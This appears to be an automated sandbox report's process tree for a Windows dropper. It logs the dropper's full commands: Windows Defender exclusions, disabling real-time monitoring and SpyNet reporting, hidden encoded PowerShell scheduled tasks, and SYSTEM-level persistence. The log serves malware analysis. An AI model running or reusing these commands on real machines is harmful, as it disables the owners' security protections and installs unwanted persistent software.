PID 652 wrote to memory of 776 652 forfiles.exe 33 PID 652 wrote to memory of 776 652 forfiles.exe 33 PID 652 wrote to memory of 776 652 forfiles.exe 33 PID 652 wrote to memory of 776 652 forfiles.exe 33 PID 652 wrote to memory of 776 652 forfiles.exe 33 PID 652 wrote to memory of 776 652 forfiles.exe 33 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 380 wrote to memory of 1204 380 forfiles.exe 34 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 1204 wrote to memory of 1844 1204 cmd.exe 36 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 776 wrote to memory of 1800 776 cmd.exe 35 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 1204 wrote to memory of 1008 1204 cmd.exe 38 PID 776 wrote to memory of 1688 776 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\7zS3A43.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\7zS43B5.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:776 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1800
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1688
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1844
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1008
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gquyvNNFn" /SC once /ST 05:23:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gquyvNNFn"4⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gquyvNNFn"4⤵PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGKvUxYEKJhmpNiCsB" /SC once /ST 20:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\rBmOUbp.exe\" G6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:888
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {56E74232-5B55-47B0-8F6C-E56DE3463F2B} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:1748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1784
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:692
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:272
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1516
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:624
-
C:\Windows\system32\taskeng.exetaskeng.exe {9C682A6C-5798-42CC-B5B9-CA22E2F6B803} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:672
-
C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\rBmOUbp.exeC:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\rBmOUbp.exe G6 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:976 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUJfOssNm" /SC once /ST 04:31:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUJfOssNm"3⤵PID:272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUJfOssNm"3⤵PID:1308
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1884
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1784
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1144
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHKMbpYRi" /SC once /ST 11:05:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHKMbpYRi"3⤵PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHKMbpYRi"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:323⤵PID:1604
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:643⤵PID:1000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:323⤵PID:1692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:324⤵PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:643⤵PID:1100
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:644⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\SVXwGszHTIpIGNNH\zcqmETRz\SLdEQmqADdKbsmgm.wsf"3⤵PID:1352
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\SVXwGszHTIpIGNNH\zcqmETRz\SLdEQmqADdKbsmgm.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1112 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:644⤵PID:860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:644⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:324⤵PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:644⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BsYOAUalmtuIFlVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BsYOAUalmtuIFlVB" /t REG_DWORD /d 0 /reg:644⤵PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:324⤵PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:324⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:644⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:644⤵PID:1484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:324⤵PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:644⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:324⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BsYOAUalmtuIFlVB" /t REG_DWORD /d 0 /reg:324⤵PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BsYOAUalmtuIFlVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx" /t REG_DWORD /d 0 /reg:324⤵PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx" /t REG_DWORD /d 0 /reg:644⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:324⤵PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SVXwGszHTIpIGNNH" /t REG_DWORD /d 0 /reg:644⤵PID:1208
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gapEAfahq" /SC once /ST 02:23:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gapEAfahq"3⤵PID:856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gapEAfahq"3⤵PID:1628
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1480
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1100
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyQsokuHCPHrPIKjm" /SC once /ST 13:54:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\rSagEer.exe\" nk /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyQsokuHCPHrPIKjm"3⤵PID:1744
-
-
-
C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\rSagEer.exeC:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\rSagEer.exe nk /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:792 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bGKvUxYEKJhmpNiCsB"3⤵PID:452
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1804
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1112
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1844
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jNivjIkKU\zwRShC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydofTeYvCFRiBkl" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydofTeYvCFRiBkl2" /F /xml "C:\Program Files (x86)\jNivjIkKU\aXcLiiZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydofTeYvCFRiBkl"3⤵PID:1172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydofTeYvCFRiBkl"3⤵PID:532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LBuWRqeXoiHTKS" /F /xml "C:\Program Files (x86)\HCxyEYsLPoBU2\vFafJzw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oqzULkuhADdZu2" /F /xml "C:\ProgramData\BsYOAUalmtuIFlVB\vbNcBoS.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uNiyNhNrKWiTQIMhb2" /F /xml "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\uDQIoUi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UeTWhQAkQYvpBfdsNev2" /F /xml "C:\Program Files (x86)\VYxEjiIKDDwYC\mWqvbEB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1712
-
-
